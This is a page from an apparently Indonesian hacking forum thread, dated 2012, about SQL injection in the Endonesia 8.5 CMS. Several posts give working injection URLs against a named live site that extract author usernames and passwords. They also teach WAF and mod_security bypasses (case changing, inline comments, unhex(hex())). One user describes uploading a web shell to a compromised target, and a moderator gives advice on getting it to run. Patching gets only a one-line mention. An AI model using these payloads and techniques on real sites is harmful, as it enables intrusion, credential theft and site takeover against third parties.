Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-23-2013, 11:05 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 2 3 4 5 ... 15 Next »

[Tutor] Exploit ( Endonesia 8.5 SQL Injection )

Home General Computer Multimedia Business Lounge

Pages (3): « Previous 1 2 3
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor Exploit ( Endonesia 8.5 SQL Injection )
03-04-2012, 08:00 AM
Post: #21
Patronum_inc Offline
./Devilz Commander
Posts: 364
Joined: Dec 2011
Reputation: 53
RE: Exploit ( Endonesia 8.5 SQL Injection )
ngeri sekali tutornya takut tpi mantap infonya mantap lanjutkan omz
Find all posts by this user
Quote this message in a reply
03-04-2012, 09:43 AM
Post: #22
momodrock Offline
./Devilz Musician .\m/
Posts: 551
Joined: Oct 2011
Reputation: 26
RE: Exploit ( Endonesia 8.5 SQL Injection )
(03-04-2012 01:43 AM)ohara_inamiji Wrote:  
(03-04-2012 01:19 AM)momodrock Wrote:  udah dpt target om.. udah upload shell
tp ko' g boleh exekusi shell.x

Quote:Forbidden

You don't have permission to access /mod/content/foto/15.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

tersipu
ane juga sering om kayak gitu...
kemungkinan karena beberapa settingan di server nya . misal mungkin folder tempat ente upload shell di set chomd nya 777.
saran ane, coba upload di uploader lain di cms nya.
atau lebih jelas nya coba ente simak thread ini
" http://devilzc0de.org/forum/thread-12000.html "
" http://devilzc0de.org/forum/thread-5258.html "
ane juga masih awam kalo masalah upload shell.

mantap mksih om.. tersipu
Visit this user's website Find all posts by this user
Quote this message in a reply
03-04-2012, 11:00 AM
Post: #23
try4error Offline
./Devilz Commander
Posts: 344
Joined: Jan 2012
Reputation: 19
RE: Exploit ( Endonesia 8.5 SQL Injection )
caara ngepatchnya gmna ya bang ?
Visit this user's website Find all posts by this user
Quote this message in a reply
03-04-2012, 07:33 PM
Post: #24
ohara_inamiji Offline
^^"
**
Moderators
Posts: 761
Joined: Jun 2011
Reputation: 46
RE: Exploit ( Endonesia 8.5 SQL Injection )
(03-04-2012 11:00 AM)try4error Wrote:  caara ngepatchnya gmna ya bang ?

nge patch nya bisa make preg_match atau make fungsi stripos...

http://devilzc0de.org/forum/thread-1256-...ml#pid8038
Visit this user's website Find all posts by this user
Quote this message in a reply
03-04-2012, 08:52 PM
Post: #25
EksMillionere Offline
./Devilz 1st Cadet
Posts: 30
Joined: May 2011
Reputation: 0
RE: Exploit ( Endonesia 8.5 SQL Injection )
(03-04-2012 07:33 PM)ohara_inamiji Wrote:  
(03-04-2012 11:00 AM)try4error Wrote:  caara ngepatchnya gmna ya bang ?

nge patch nya bisa make preg_match atau make fungsi stripos...

http://devilzc0de.org/forum/thread-1256-...ml#pid8038
setiap dengar kang ohara ngomong,
berasa aura keilmuan ane menigkat terus-menerus..
mantap
Find all posts by this user
Quote this message in a reply
03-05-2012, 11:52 AM
Post: #26
mariachi Away
has been reboot
**
Moderators
Posts: 2,368
Joined: Nov 2010
Reputation: 55
RE: Exploit ( Endonesia 8.5 SQL Injection )
si ohara ngerjain cms endonesia mulu ckckckckck.... pasrah


btw, dewa ente bro. salam gluers... mawar
Find all posts by this user
Quote this message in a reply
03-19-2012, 03:46 PM (This post was last modified: 03-19-2012 03:47 PM by theMuph.)
Post: #27
theMuph Offline
./Devilz 1st Cadet
Posts: 44
Joined: Jul 2011
Reputation: 0
RE: Exploit ( Endonesia 8.5 SQL Injection )
(03-03-2012 10:48 PM)ohara_inamiji Wrote:  
(03-03-2012 10:21 PM)EksMillionere Wrote:  kang ohara, ane masih ucup bnget nih..
itu kok sqli nya beda ama sqli yg ane sering liat,
kaya gini..

Code:
unhex(hex(group_concat(aid,0x3a,name,0x3a,pwd)))

trus
Code:
/*!union*/+all+/*!select*/

trus
Code:
uniOn+all+sElect

itu apaan yahh?? trus, kang ohara kok bisa tau kya gitu cara nginjeknya, bukan cara yg biasa??bingung

sorry bngt kang ohara, ane bnyak tanya,,
ane pingin juga bisa ngoprek diocalhost, kaya kang ohara dan akang2 yg om lainnya di devilc0de
belajar
terima kasih sebelumnya

intinya simple banget om thread ane ini, dari ketiga kode yang om tanyai di atas mempunyai fungsi yang sama, yaitu buat bypass forbidden, napa perlu di bypass? karena ketika ente pentest make error based sqli akses di tolak atau forbidden,mungkin karena target menggunakan firewall atau mod_security.

kalo detail dan teori nya saya gak begitu faham, karena learning by doing om ketawa

mungkin penjelasan singkat ini berkenan
"unhex(hex()" ==> pemakaian nya ente masukan di setiap kolom pada url target. contoh :
tanpa penggunaan unhex(hex())
Code:
http://www.planethijau.com/mod.php?mod=diskusi&op=viewcat&cid=-32+uniOn+all+sElect+1,group_concat(name,0x3a,pwd),3+from+authors--
menggunakan unhex(hex())
http://www.planethijau.com/mod.php?mod=d...+authors--

ketika ente buka url di atas, maka tampilan nya tetap forbidden ... maka kita gunakan teknik bypass lain nya... di antaranya seperti yang ane pake pada query di atas...

alternatif pertama : merubah pattern union+all+select menjadi kombinasi huruf kecil dan huruf besar atau bahasa keren nya Case Changing " uniOn+all+sElect."

http://www.planethijau.com/mod.php?mod=d...+authors--

maka bypass pun berhasil ketawa

alternatif kedua : menggunakan teknik bypass dengan inline comments, udah saya buat thread nya di sini " http://devilzc0de.org/forum/thread-13188.html " . tetapi inline comment bisanya cuman di dbms mysql. itu bukan kata ane, tapi kata paper yang pernah ane baca "http://www.exploit-db.com/papers/17934/"

contoh penggunaan inline comment union+all+select di ubah menjadi /*!union*/+all+/*!select*/

http://www.planethijau.com/mod.php?mod=d...+authors--

ketawa sabar om belajar ada proses nya kok .




om ane dah coba bypass tapi kok masih di tolak ???dead

nih om http://serulink.webatu.com/mod.php?mod=d...,4,5,6,7--

kira2 knapa ?? n solusinya gmana y om ???

belajarbelajar
Find all posts by this user
Quote this message in a reply
03-19-2012, 05:13 PM
Post: #28
ohara_inamiji Offline
^^"
**
Moderators
Posts: 761
Joined: Jun 2011
Reputation: 46
RE: Exploit ( Endonesia 8.5 SQL Injection )
(03-19-2012 03:46 PM)theMuph Wrote:  
(03-03-2012 10:48 PM)ohara_inamiji Wrote:  
(03-03-2012 10:21 PM)EksMillionere Wrote:  kang ohara, ane masih ucup bnget nih..
itu kok sqli nya beda ama sqli yg ane sering liat,
kaya gini..

Code:
unhex(hex(group_concat(aid,0x3a,name,0x3a,pwd)))

trus
Code:
/*!union*/+all+/*!select*/

trus
Code:
uniOn+all+sElect

itu apaan yahh?? trus, kang ohara kok bisa tau kya gitu cara nginjeknya, bukan cara yg biasa??bingung

sorry bngt kang ohara, ane bnyak tanya,,
ane pingin juga bisa ngoprek diocalhost, kaya kang ohara dan akang2 yg om lainnya di devilc0de
belajar
terima kasih sebelumnya

intinya simple banget om thread ane ini, dari ketiga kode yang om tanyai di atas mempunyai fungsi yang sama, yaitu buat bypass forbidden, napa perlu di bypass? karena ketika ente pentest make error based sqli akses di tolak atau forbidden,mungkin karena target menggunakan firewall atau mod_security.

kalo detail dan teori nya saya gak begitu faham, karena learning by doing om ketawa

mungkin penjelasan singkat ini berkenan
"unhex(hex()" ==> pemakaian nya ente masukan di setiap kolom pada url target. contoh :
tanpa penggunaan unhex(hex())
Code:
http://www.planethijau.com/mod.php?mod=diskusi&op=viewcat&cid=-32+uniOn+all+sElect+1,group_concat(name,0x3a,pwd),3+from+authors--
menggunakan unhex(hex())
http://www.planethijau.com/mod.php?mod=d...+authors--

ketika ente buka url di atas, maka tampilan nya tetap forbidden ... maka kita gunakan teknik bypass lain nya... di antaranya seperti yang ane pake pada query di atas...

alternatif pertama : merubah pattern union+all+select menjadi kombinasi huruf kecil dan huruf besar atau bahasa keren nya Case Changing " uniOn+all+sElect."

http://www.planethijau.com/mod.php?mod=d...+authors--

maka bypass pun berhasil ketawa

alternatif kedua : menggunakan teknik bypass dengan inline comments, udah saya buat thread nya di sini " http://devilzc0de.org/forum/thread-13188.html " . tetapi inline comment bisanya cuman di dbms mysql. itu bukan kata ane, tapi kata paper yang pernah ane baca "http://www.exploit-db.com/papers/17934/"

contoh penggunaan inline comment union+all+select di ubah menjadi /*!union*/+all+/*!select*/

http://www.planethijau.com/mod.php?mod=d...+authors--

ketawa sabar om belajar ada proses nya kok .




om ane dah coba bypass tapi kok masih di tolak ???dead

nih om http://serulink.webatu.com/mod.php?mod=d...,4,5,6,7--

kira2 knapa ?? n solusinya gmana y om ???

belajarbelajar
mungkin udah patching itu bro...
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (3): « Previous 1 2 3
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] WordPress Exploit (easy-comment-uploads/upload-form.php) XPByte 16 1,040 05-19-2013 05:40 PM
Last Post: oe_c0x
Bug [Tutor] Facebook session Exploit Priv8 abuabu_hat10 20 394 05-19-2013 05:36 PM
Last Post: oe_c0x
  MinaliC Webserver 2.0.0 HTTP Post Exploit cr0security 8 139 04-23-2013 09:07 AM
Last Post: darkmessage
  [Tutor] Exploit windows dengan add on dan dns spoof RieqyNS13 17 336 02-10-2013 08:35 PM
Last Post: cangcimen
Thumbs Up [Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload Regel 11 672 02-02-2013 12:19 AM
Last Post: copaker21
  Butuh Local Exploit Kernel Server AnonymousOpsID 2 164 11-24-2012 08:37 PM
Last Post: AnonymousOpsID
  #DiyWeb Admin Bypass dan Remote file/shell Upload exploit AnonymousOpsID 4 337 11-06-2012 05:07 PM
Last Post: rock_me
Rainbow Kumpulan exploit dan 3000++ tool hacking dvildance 3 344 10-31-2012 10:23 PM
Last Post: jibril
  [Ask] [metasploit] gagal exploit ke komputer target via LAN w0rmil_alazka 10 189 10-29-2012 10:46 AM
Last Post: p0pc0rn
  php root shell exploit buat mesin x86_64 (tanpa bind dan bc) mywisdom 38 1,672 10-01-2012 10:06 PM
Last Post: Danzel

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-23-2013, 11:05 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE